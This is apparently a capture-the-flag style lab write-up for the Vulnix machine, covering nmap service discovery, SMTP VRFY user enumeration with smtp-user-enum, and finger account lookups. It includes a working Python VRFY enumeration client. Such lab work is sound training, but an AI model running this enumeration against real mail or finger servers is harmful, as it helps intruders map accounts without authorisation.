HackLab: Vulnix
Service discovery:
First, I fired up HaGashash (https://github.com/Gandosha/HaGashash) to gain some information about which host to attack and what interesting services run there.
[GandoPC ~]# go run go/src/github.com/Gandosha/HaGashash/main.go -interface=enp0s3 -project=HackLab:_Vulnix -subnet=true
<-=|HaGashash by Gandosha|=->
[+] nmap executable is in '/usr/bin/nmap'
[+] ifconfig executable is in '/usr/bin/ifconfig'
[!] Dependencies check is completed successfully.
[!] Starting to scan your subnet.
[+] Alive hosts in 192.168.43.0/24 are:
192.168.43.1
192.168.43.2
192.168.43.3
192.168.43.4
[+] Directory created at: /HaGashash_Projects/HackLab:_Vulnix/192.168.43.1.
[!] Starting to scan 192.168.43.1 for TCP interesting stuff.
[!] Starting to scan 192.168.43.1 for UDP interesting stuff.
[+] Directory created at: /HaGashash_Projects/HackLab:_Vulnix/192.168.43.2.
[!] Starting to scan 192.168.43.2 for TCP interesting stuff.
[!] Starting to scan 192.168.43.2 for UDP interesting stuff.
[+] Directory created at: /HaGashash_Projects/HackLab:_Vulnix/192.168.43.3.
[!] Starting to scan 192.168.43.3 for TCP interesting stuff.
[!] Starting to scan 192.168.43.3 for UDP interesting stuff.
[+] Directory created at: /HaGashash_Projects/HackLab:_Vulnix/192.168.43.4.
[!] Starting to scan 192.168.43.4 for UDP interesting stuff.
[!] Starting to scan 192.168.43.4 for TCP interesting stuff.
[+] Nmap's TCP script scanning on 192.168.43.4 is completed successfully.
[+] Nmap's UDP script scanning on 192.168.43.4 is completed successfully.
[+] Nmap's TCP script scanning on 192.168.43.3 is completed successfully.
[+] Nmap's TCP script scanning on 192.168.43.1 is completed successfully.
[+] Nmap's TCP script scanning on 192.168.43.2 is completed successfully.
[+] Nmap's UDP script scanning on 192.168.43.3 is completed successfully.
[+] Nmap's UDP script scanning on 192.168.43.2 is completed successfully.
[+] Nmap's UDP script scanning on 192.168.43.1 is completed successfully.
[+] Summary file for 192.168.43.4 is ready.
[+] Summary file for 192.168.43.3 is ready.
[+] Summary file for 192.168.43.2 is ready.
[+] Summary file for 192.168.43.1 is ready.
[gandosha@GandoPC 192.168.43.4]$ cat nmap_TCP_scan_output
# Nmap 7.70 scan initiated Tue Oct 16 13:53:29 2018 as: nmap -sS -p- -A -T4 -Pn -vv -oN /HaGashash_Projects/HackLab:_Vulnix/192.168.43.4/nmap_TCP_scan_output 192.168.43.4
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.43.4
Host is up, received arp-response (0.0028s latency).
Scanned at 2018-10-16 13:53:31 IDT for 35s
Not shown: 65518 closed ports
Reason: 65518 resets
PORT      STATE SERVICE    REASON         VERSION
22/tcp    open  ssh        syn-ack ttl 64 OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
| ssh-dss [key data not present on the page]
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1jCDgzdowLQVOEXrczN+xbuMcNkncz2EfCEncP7k8rhNjQq+eXzMKEfULxMLh/wLFhX2TVZDECTpQ0WVJckgkGeZSdvmEJKt5LbZlSm5HAz/DMUKIuohDRI4F3lqn9u5VAVKSyTXyR3EuxCsCHJy+Xf40BJImr+fZ7yH3xwPPqJ9in+LfgTXaRItqLDHiHAsTIXXwsDgweaS9hSTAR1MO+TdZCnXKPJ1NEt38+Fl7rnTnBE2TdtU3iyrlWXE0GGGg0bgldqas7bR4UH/uRZZOZK2+UTf0qg30H7ll8ShfZIbdW+59RfQqYz8tZYsoWoxahWf3dmx5soCWWcAP7DAV
|   256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGEudclsh1beHM/DPWQGR31dOGqdLcXVj1xLG/YSGfiNmN1pT6x0MwYQyN6pzCzzonljThH8JwIZjid+JN2PzxE=
25/tcp    open  smtp       syn-ack ttl 64 Postfix smtpd
|_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=vulnix
| Issuer: commonName=vulnix
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:12
| Not valid after:  2022-08-31T17:40:12
| MD5:   58e3 f1ac fef6 b6d1 744c 836f ba24 4f0a
| SHA-1: 712f 69ba 8c54 32e5 711c 898b 55ab 0a83 44a0 420b
| -----BEGIN CERTIFICATE-----
| MIICnjCCAYYCCQCrWhznjAI2hTANBgkqhkiG9w0BAQUFADARMQ8wDQYDVQQDEwZ2
| dWxuaXgwHhcNMTIwOTAyMTc0MDEyWhcNMjIwODMxMTc0MDEyWjARMQ8wDQYDVQQD
| EwZ2dWxuaXgwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDDbiWM7/Xk
| 7+VnQuSzKIy6GgD9xAw5jCnKmRY6MfJ0jNmpIjo70LEpoTTEZvFLwKbdkxQHzusv
| 50GOrZLm6MkrB2Ad8skvkJR9PA05KoM+Uha5P35rdF0MaNPtHRpA5W3Ql3qAoph7
| 8hGmdI4GrLmedxkmajniCYNpowArI7UjYA5FWF6q1m41CS+xCqk9u4qH8SrV616z
| bJ2H00mhp0NJDJbTDX35biGeGKR70e5xQAkMwQKM6s9iLBo2nrH2JKyxfVMeMgQf
| KoRJEeILZbgP4X9Xc6iA9GuNSqluObOhCv1RsFLP915xNvnf6aZf8EtyODISzXhj
| GBsy//uolXMLAgMBAAEwDQYJKoZIhvcNAQEFBQADggEBAIJHgnARP3nuoFigE9vE
| CyK9sKYPn+nh0xOMFil2LzfcZsVRqTl0T/VbOug1i+pettkcPqWBBNs1Q5uSEIuP
| 0pEq9AQdeLk7weMa0trDK+XoSbEvcAvYPnbK6Ghr343FE74nmxewtfCbrNfEnYZB
| TYlEElBqcQFSo4kB6UyMOOGwuIJ7EHITPa7ZxKW6OBOVOzCUiYm3hGn7dpyVeaH/
| zpSwobV1pSqyW7+Tb3KO82lqSnmYvRzk3TmIVXutOXTVE+L58xbo5uafae2UvP4m
| m5Be1rZi17Ub1kIMKT+OJLq2oaDb6Y8Ni/a267RoGO/TcwCLjKHsDl5Niwk6rYMX
| ZtY=
|_-----END CERTIFICATE-----
|_ssl-date: 2018-10-16T10:53:56+00:00; -1s from scanner time.
79/tcp    open  finger     syn-ack ttl 64 Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open  pop3       syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL RESP-CODES CAPA UIDL TOP STLS
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix
| Issuer: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after:  2022-09-02T17:40:22
| MD5:   2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
| SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
| -----BEGIN CERTIFICATE-----
| MIIDizCCAnOgAwIBAgIJAKvS691t83I+MA0GCSqGSIb3DQEBBQUAMFwxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UE
| AwwGdnVsbml4MRowGAYJKoZIhvcNAQkBFgtyb290QHZ1bG5peDAeFw0xMjA5MDIx
| NzQwMjJaFw0yMjA5MDIxNzQwMjJaMFwxHDAaBgNVBAoME0RvdmVjb3QgbWFpbCBz
| ZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UEAwwGdnVsbml4MRowGAYJKoZI
| hvcNAQkBFgtyb290QHZ1bG5peDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
| ggEBALv7qqgwWV56bHtf/0PqD6yMN1bv866H5gqrVENXrfaL8ZOiNCD9/Fg6jOuh
| VLV5iw5y8lKNdMZW5PWHN8mQEeoyWWFXMV1X4RLvOuTIf1sXNHp+IcwZpDDobHzQ
| ENhpwhlWTxdObUEVVT/ChOTaAQIpi9AFzo4fjJ4UEHfEae98cssmuqQP9Unj9xKv
| vCj181l3g9VAQ92KjxWeWMa8e+ecwBVtAsPdU3ZwmwVIuVnBDa9nRdkR0y31RWSr
| /Lil4ckL0TZ4K92z146pTex7QSNKGHyuLPJGddm5pu11WP5cJEz9O2MDOo6WEISb
| V7EEpfbvrA6cd+ISf4dGSyNZfp8CAwEAAaNQME4wHQYDVR0OBBYEFACM4N/xHviz
| b3W/Qea+BvYb3O7AMB8GA1UdIwQYMBaAFACM4N/xHvizb3W/Qea+BvYb3O7AMAwG
| A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAEP1Kk3MagUfM6kOLgK++4gV
| LJzOC1OGQ/ERyNRhk8JgVbhuasrC7hNtzk2ku7yP4H8IlVzjs4EGQOxoGKHnrzBr
| 76iqlQRASZbJPwemc1CpRbh7XTZAOPHUbihycpG4iQZD2/55c6Az+TcyHLqjPbCW
| YVCAB8mMXDtYEB4OiOEvbulud5fjXAu7ba8tzUSqAWF7dA9S/vcmmnCC+y1nV9Tc
| 8K1+edk6WTOjoQEALUA5ikfB8I8O95AWPkfcj77BOiPOvPlEGlaWm85DMRkVOatg
| mqDiJCaX/SajIW22LgEw81ErtM8m6RAZ1qN+sf9O6T7+Mxvbd6aPx/bxj/LwQ6c=
|_-----END CERTIFICATE-----
|_ssl-date: 2018-10-16T10:53:57+00:00; 0s from scanner time.
111/tcp   open  rpcbind    syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo: 
|   program  version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41645/tcp  mountd
|   100005  1,2,3      47493/udp  mountd
|   100021  1,3,4      50218/udp  nlockmgr
|   100021  1,3,4      60141/tcp  nlockmgr
|   100024  1          51815/udp  status
|   100024  1          60680/tcp  status
|   100227  2,3         2049/tcp  nfs_acl
|_  100227  2,3         2049/udp  nfs_acl
143/tcp   open  imap       syn-ack ttl 64 Dovecot imapd
|_imap-capabilities: more have OK listed capabilities LITERAL+ Pre-login LOGIN-REFERRALS post-login ENABLE SASL-IR ID IMAP4rev1 IDLE STARTTLS LOGINDISABLEDA0001
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix
| Issuer: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after:  2022-09-02T17:40:22
| MD5:   2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
| SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
| -----BEGIN CERTIFICATE-----
| MIIDizCCAnOgAwIBAgIJAKvS691t83I+MA0GCSqGSIb3DQEBBQUAMFwxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UE
| AwwGdnVsbml4MRowGAYJKoZIhvcNAQkBFgtyb290QHZ1bG5peDAeFw0xMjA5MDIx
| NzQwMjJaFw0yMjA5MDIxNzQwMjJaMFwxHDAaBgNVBAoME0RvdmVjb3QgbWFpbCBz
| ZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UEAwwGdnVsbml4MRowGAYJKoZI
| hvcNAQkBFgtyb290QHZ1bG5peDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
| ggEBALv7qqgwWV56bHtf/0PqD6yMN1bv866H5gqrVENXrfaL8ZOiNCD9/Fg6jOuh
| VLV5iw5y8lKNdMZW5PWHN8mQEeoyWWFXMV1X4RLvOuTIf1sXNHp+IcwZpDDobHzQ
| ENhpwhlWTxdObUEVVT/ChOTaAQIpi9AFzo4fjJ4UEHfEae98cssmuqQP9Unj9xKv
| vCj181l3g9VAQ92KjxWeWMa8e+ecwBVtAsPdU3ZwmwVIuVnBDa9nRdkR0y31RWSr
| /Lil4ckL0TZ4K92z146pTex7QSNKGHyuLPJGddm5pu11WP5cJEz9O2MDOo6WEISb
| V7EEpfbvrA6cd+ISf4dGSyNZfp8CAwEAAaNQME4wHQYDVR0OBBYEFACM4N/xHviz
| b3W/Qea+BvYb3O7AMB8GA1UdIwQYMBaAFACM4N/xHvizb3W/Qea+BvYb3O7AMAwG
| A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAEP1Kk3MagUfM6kOLgK++4gV
| LJzOC1OGQ/ERyNRhk8JgVbhuasrC7hNtzk2ku7yP4H8IlVzjs4EGQOxoGKHnrzBr
| 76iqlQRASZbJPwemc1CpRbh7XTZAOPHUbihycpG4iQZD2/55c6Az+TcyHLqjPbCW
| YVCAB8mMXDtYEB4OiOEvbulud5fjXAu7ba8tzUSqAWF7dA9S/vcmmnCC+y1nV9Tc
| 8K1+edk6WTOjoQEALUA5ikfB8I8O95AWPkfcj77BOiPOvPlEGlaWm85DMRkVOatg
| mqDiJCaX/SajIW22LgEw81ErtM8m6RAZ1qN+sf9O6T7+Mxvbd6aPx/bxj/LwQ6c=
|_-----END CERTIFICATE-----
|_ssl-date: 2018-10-16T10:53:57+00:00; -1s from scanner time.
512/tcp   open  exec       syn-ack ttl 64 netkit-rsh rexecd
513/tcp   open  login      syn-ack ttl 64
514/tcp   open  shell      syn-ack ttl 64 Netkit rshd
993/tcp   open  ssl/imap   syn-ack ttl 64 Dovecot imapd
|_imap-capabilities: more have Pre-login listed LITERAL+ capabilities LOGIN-REFERRALS post-login ENABLE SASL-IR OK IMAP4rev1 IDLE AUTH=PLAINA0001 ID
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix
| Issuer: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after:  2022-09-02T17:40:22
| MD5:   2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
| SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
| -----BEGIN CERTIFICATE-----
| MIIDizCCAnOgAwIBAgIJAKvS691t83I+MA0GCSqGSIb3DQEBBQUAMFwxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UE
| AwwGdnVsbml4MRowGAYJKoZIhvcNAQkBFgtyb290QHZ1bG5peDAeFw0xMjA5MDIx
| NzQwMjJaFw0yMjA5MDIxNzQwMjJaMFwxHDAaBgNVBAoME0RvdmVjb3QgbWFpbCBz
| ZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UEAwwGdnVsbml4MRowGAYJKoZI
| hvcNAQkBFgtyb290QHZ1bG5peDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
| ggEBALv7qqgwWV56bHtf/0PqD6yMN1bv866H5gqrVENXrfaL8ZOiNCD9/Fg6jOuh
| VLV5iw5y8lKNdMZW5PWHN8mQEeoyWWFXMV1X4RLvOuTIf1sXNHp+IcwZpDDobHzQ
| ENhpwhlWTxdObUEVVT/ChOTaAQIpi9AFzo4fjJ4UEHfEae98cssmuqQP9Unj9xKv
| vCj181l3g9VAQ92KjxWeWMa8e+ecwBVtAsPdU3ZwmwVIuVnBDa9nRdkR0y31RWSr
| /Lil4ckL0TZ4K92z146pTex7QSNKGHyuLPJGddm5pu11WP5cJEz9O2MDOo6WEISb
| V7EEpfbvrA6cd+ISf4dGSyNZfp8CAwEAAaNQME4wHQYDVR0OBBYEFACM4N/xHviz
| b3W/Qea+BvYb3O7AMB8GA1UdIwQYMBaAFACM4N/xHvizb3W/Qea+BvYb3O7AMAwG
| A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAEP1Kk3MagUfM6kOLgK++4gV
| LJzOC1OGQ/ERyNRhk8JgVbhuasrC7hNtzk2ku7yP4H8IlVzjs4EGQOxoGKHnrzBr
| 76iqlQRASZbJPwemc1CpRbh7XTZAOPHUbihycpG4iQZD2/55c6Az+TcyHLqjPbCW
| YVCAB8mMXDtYEB4OiOEvbulud5fjXAu7ba8tzUSqAWF7dA9S/vcmmnCC+y1nV9Tc
| 8K1+edk6WTOjoQEALUA5ikfB8I8O95AWPkfcj77BOiPOvPlEGlaWm85DMRkVOatg
| mqDiJCaX/SajIW22LgEw81ErtM8m6RAZ1qN+sf9O6T7+Mxvbd6aPx/bxj/LwQ6c=
|_-----END CERTIFICATE-----
|_ssl-date: 2018-10-16T10:53:56+00:00; 0s from scanner time.
995/tcp   open  ssl/pop3   syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL(PLAIN) RESP-CODES CAPA UIDL USER TOP
| ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix
| Issuer: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2012-09-02T17:40:22
| Not valid after:  2022-09-02T17:40:22
| MD5:   2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc
| SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e
| -----BEGIN CERTIFICATE-----
| MIIDizCCAnOgAwIBAgIJAKvS691t83I+MA0GCSqGSIb3DQEBBQUAMFwxHDAaBgNV
| BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UE
| AwwGdnVsbml4MRowGAYJKoZIhvcNAQkBFgtyb290QHZ1bG5peDAeFw0xMjA5MDIx
| NzQwMjJaFw0yMjA5MDIxNzQwMjJaMFwxHDAaBgNVBAoME0RvdmVjb3QgbWFpbCBz
| ZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UEAwwGdnVsbml4MRowGAYJKoZI
| hvcNAQkBFgtyb290QHZ1bG5peDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
| ggEBALv7qqgwWV56bHtf/0PqD6yMN1bv866H5gqrVENXrfaL8ZOiNCD9/Fg6jOuh
| VLV5iw5y8lKNdMZW5PWHN8mQEeoyWWFXMV1X4RLvOuTIf1sXNHp+IcwZpDDobHzQ
| ENhpwhlWTxdObUEVVT/ChOTaAQIpi9AFzo4fjJ4UEHfEae98cssmuqQP9Unj9xKv
| vCj181l3g9VAQ92KjxWeWMa8e+ecwBVtAsPdU3ZwmwVIuVnBDa9nRdkR0y31RWSr
| /Lil4ckL0TZ4K92z146pTex7QSNKGHyuLPJGddm5pu11WP5cJEz9O2MDOo6WEISb
| V7EEpfbvrA6cd+ISf4dGSyNZfp8CAwEAAaNQME4wHQYDVR0OBBYEFACM4N/xHviz
| b3W/Qea+BvYb3O7AMB8GA1UdIwQYMBaAFACM4N/xHvizb3W/Qea+BvYb3O7AMAwG
| A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAEP1Kk3MagUfM6kOLgK++4gV
| LJzOC1OGQ/ERyNRhk8JgVbhuasrC7hNtzk2ku7yP4H8IlVzjs4EGQOxoGKHnrzBr
| 76iqlQRASZbJPwemc1CpRbh7XTZAOPHUbihycpG4iQZD2/55c6Az+TcyHLqjPbCW
| YVCAB8mMXDtYEB4OiOEvbulud5fjXAu7ba8tzUSqAWF7dA9S/vcmmnCC+y1nV9Tc
| 8K1+edk6WTOjoQEALUA5ikfB8I8O95AWPkfcj77BOiPOvPlEGlaWm85DMRkVOatg
| mqDiJCaX/SajIW22LgEw81ErtM8m6RAZ1qN+sf9O6T7+Mxvbd6aPx/bxj/LwQ6c=
|_-----END CERTIFICATE-----
|_ssl-date: 2018-10-16T10:53:55+00:00; -1s from scanner time.
2049/tcp  open  nfs_acl    syn-ack ttl 64 2-3 (RPC #100227)
36654/tcp open  mountd     syn-ack ttl 64 1-3 (RPC #100005)
41645/tcp open  mountd     syn-ack ttl 64 1-3 (RPC #100005)
43602/tcp open  mountd     syn-ack ttl 64 1-3 (RPC #100005)
60141/tcp open  nlockmgr   syn-ack ttl 64 1-4 (RPC #100021)
60680/tcp open  status     syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:AF:E3:88 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=10/16%OT=22%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=5B
OS:C5C34E%P=x86_64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=
OS:I%TS=8)OPS(O1=M5B4ST11NW3%O2=M5B4ST11NW3%O3=M5B4NNT11NW3%O4=M5B4ST11NW3%
OS:O5=M5B4ST11NW3%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W
OS:6=3890)ECN(R=Y%DF=Y%TG=40%W=3908%O=M5B4NNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%
OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=N)IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 198.047 days (since Sun Apr  1 12:45:48 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host:  vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: -1s

TRACEROUTE
HOP RTT     ADDRESS
1   2.80 ms 192.168.43.4

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 16 13:54:06 2018 -- 1 IP address (1 host up) scanned in 38.08 seconds
Port 25 check:
Port 25 is open and the Postfix banner advertises VRFY, so the server will confirm whether a given local address exists: a 250/252 reply means the recipient is known, a 550 means it is not. That turns the mail service into a user-enumeration oracle that needs no credentials.
I ran smtp-user-enum in VRFY mode to verify which users exist.
[GandoPC 192.168.43.4]# smtp-user-enum -M VRFY -U /home/gandosha/Desktop/SecLists/wordlists/unix_users.txt -t 192.168.43.4 > usernames_exist
[GandoPC 192.168.43.4]# cat usernames_exist
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /home/gandosha/Desktop/SecLists/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 112
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Oct 16 14:24:25 2018 #########
192.168.43.4: ROOT exists
192.168.43.4: backup exists
192.168.43.4: bin exists
192.168.43.4: daemon exists
192.168.43.4: games exists
192.168.43.4: gnats exists
192.168.43.4: irc exists
192.168.43.4: list exists
192.168.43.4: libuuid exists
192.168.43.4: lp exists
192.168.43.4: mail exists
192.168.43.4: man exists
192.168.43.4: messagebus exists
192.168.43.4: news exists
192.168.43.4: nobody exists
192.168.43.4: postmaster exists
192.168.43.4: proxy exists
192.168.43.4: root exists
192.168.43.4: sshd exists
192.168.43.4: sync exists
192.168.43.4: sys exists
192.168.43.4: syslog exists
192.168.43.4: user exists
192.168.43.4: uucp exists
192.168.43.4: www-data exists
######## Scan completed at Tue Oct 16 14:24:26 2018 #########
25 results.

112 queries in 1 seconds (112.0 queries / sec)
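The exchange that smtp-user-enum drives, written out as an added example (not part of the original write-up or of the tool): a minimal SMTP client that sends HELO once, then VRFY per candidate name on the same session and classifies each reply code (250/252 known, 550 unknown, 502 VRFY disabled). Two details in the output above are worth reading into it. Postfix reported both ROOT and root, so the lookup is case-insensitive and case variants should be collapsed to one account. And postmaster was reported as existing even though finger later answers "no such user" for it, because an SMTP recipient can be a mail alias rather than a login account, so a VRFY hit is a candidate, not a confirmed Unix user. FakePostfix is a constructed stand-in with Postfix-style reply strings so the code runs offline; SmtpSocket("192.168.43.4") is the live transport. The client name in HELO is an arbitrary placeholder.

```python
import socket

class SmtpSocket:
    """Line-oriented SMTP client transport over TCP (the live path, port 25 on the target)."""
    def __init__(self, host: str, port: int = 25, timeout: float = 5.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.buf = b""
    def send_line(self, line: str) -> None:
        self.sock.sendall(line.encode() + b"\r\n")
    def _recv_line(self) -> str:
        while b"\r\n" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            self.buf += chunk
        line, _, self.buf = self.buf.partition(b"\r\n")
        return line.decode(errors="replace")
    def read_reply(self) -> str:
        """One reply; '250-...' continuation lines are collected until the final '250 ' line."""
        lines = []
        while True:
            line = self._recv_line()
            lines.append(line)
            if len(line) < 4 or line[3] != "-":
                return "\n".join(lines)
    def close(self) -> None:
        self.sock.close()

class FakePostfix:
    """Constructed in-memory stand-in that answers like the Postfix smtpd on Vulnix.
    The reply texts imitate Postfix; it is not a real MTA and exists so the example runs offline."""
    def __init__(self, known_users):
        self.known = {u.lower() for u in known_users}
        self.pending = "220 vulnix ESMTP Postfix (Ubuntu)"
    def send_line(self, line: str) -> None:
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            self.pending = "250 vulnix"
        elif verb == "VRFY":
            # The scan above reported both ROOT and root, so the lookup is case-insensitive.
            if arg.lower() in self.known:
                self.pending = f"252 2.0.0 {arg}"
            else:
                self.pending = f"550 5.1.1 <{arg}>: Recipient address rejected: User unknown in local recipient table"
        elif verb == "QUIT":
            self.pending = "221 2.0.0 Bye"
        else:
            self.pending = "502 5.5.2 Error: command not recognized"
    def read_reply(self) -> str:
        return self.pending
    def close(self) -> None:
        pass

def classify_vrfy_reply(reply: str) -> str:
    """250/252: the server knows the address; 550: unknown user; 502: VRFY disabled."""
    code = reply[:3]
    if code in ("250", "252"):
        return "exists"
    if code == "550":
        return "unknown"
    if code == "502":
        return "disabled"
    return "ambiguous"

def vrfy_users(io, candidates) -> dict:
    """HELO once, then VRFY each candidate on the same session; returns {name: verdict}.
    HELO rather than EHLO keeps the greeting reply to one line; no extension is needed."""
    results = {}
    try:
        io.read_reply()                      # 220 greeting
        io.send_line("HELO scanner.local")   # placeholder client name
        io.read_reply()
        for name in candidates:
            io.send_line(f"VRFY {name}")
            results[name] = classify_vrfy_reply(io.read_reply())
        io.send_line("QUIT")
        io.read_reply()
    finally:
        io.close()
    return results

def distinct_accounts(results: dict) -> list:
    """Collapse case variants so ROOT and root count as one account."""
    return sorted({n.lower() for n, v in results.items() if v == "exists"})

if __name__ == "__main__":
    # Offline demo; for the lab host use SmtpSocket("192.168.43.4") as the transport instead.
    verdicts = vrfy_users(FakePostfix({"root", "user", "vulnix"}), ["root", "ROOT", "user", "nosuch"])
    print(verdicts)
    print(distinct_accounts(verdicts))
```

A 502 on the first VRFY means the administrator set disable_vrfy_command, in which case the RCPT TO method (which smtp-user-enum also offers) is the fallback; the classifier reports that case separately so a run against a hardened server does not silently return "nothing found".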
Port 79 check:
Finger (TCP/79) returns information about a system's user accounts to anyone who asks, without authentication: given a login name, the server replies with the login, full name, home directory, shell and last-login status.
I had to install netkit-bsd-finger (on Arch, via yaourt) and then check all those users:
[gandosha@GandoPC 192.168.43.4]$ finger -l root@192.168.43.4
[192.168.43.4]
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l backup@192.168.43.4
[192.168.43.4]
Login: backup                           Name: backup
Directory: /var/backups                 Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l bin@192.168.43.4
[192.168.43.4]
Login: bin                              Name: bin
Directory: /bin                         Shell: /bin/sh
Never logged in.
No mail.
No Plan.

[gandosha@GandoPC 192.168.43.4]$ finger -l daemon@192.168.43.4
[192.168.43.4]
Login: daemon                           Name: daemon
Directory: /usr/sbin                    Shell: /bin/sh
Never logged in.
No mail.
No Plan.

